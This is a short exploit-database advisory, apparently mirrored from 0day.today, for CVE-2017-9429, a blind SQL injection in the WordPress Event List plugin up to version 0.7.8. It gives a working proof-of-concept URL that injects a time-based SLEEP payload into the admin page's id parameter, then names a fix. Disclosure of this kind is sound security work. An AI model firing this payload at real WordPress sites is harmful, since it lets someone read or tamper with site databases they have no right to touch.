WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

2017-06-14T00:00:00
ID 1337DAY-ID-27951
Type zdt
Reporter Dimitrios Tsagkarakis
Modified 2017-06-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
# Date: 04-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu 
# Software Link: https://wordpress.org/plugins/event-list/
# Version: 0.7.8
# CVE : CVE-2017-9429
# Category: webapps
 
  
 
1. Description:
 
    
 
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php. 
 
  
 
2. Proof of Concept:
 
  
 
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
=1 AND SLEEP(10)
 
  
 
3. Solution:
 
    
 
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
 
  
 
4. Reference:
 
  
 
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
ction-sqli/
 
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

#  0day.today [2018-01-04]  #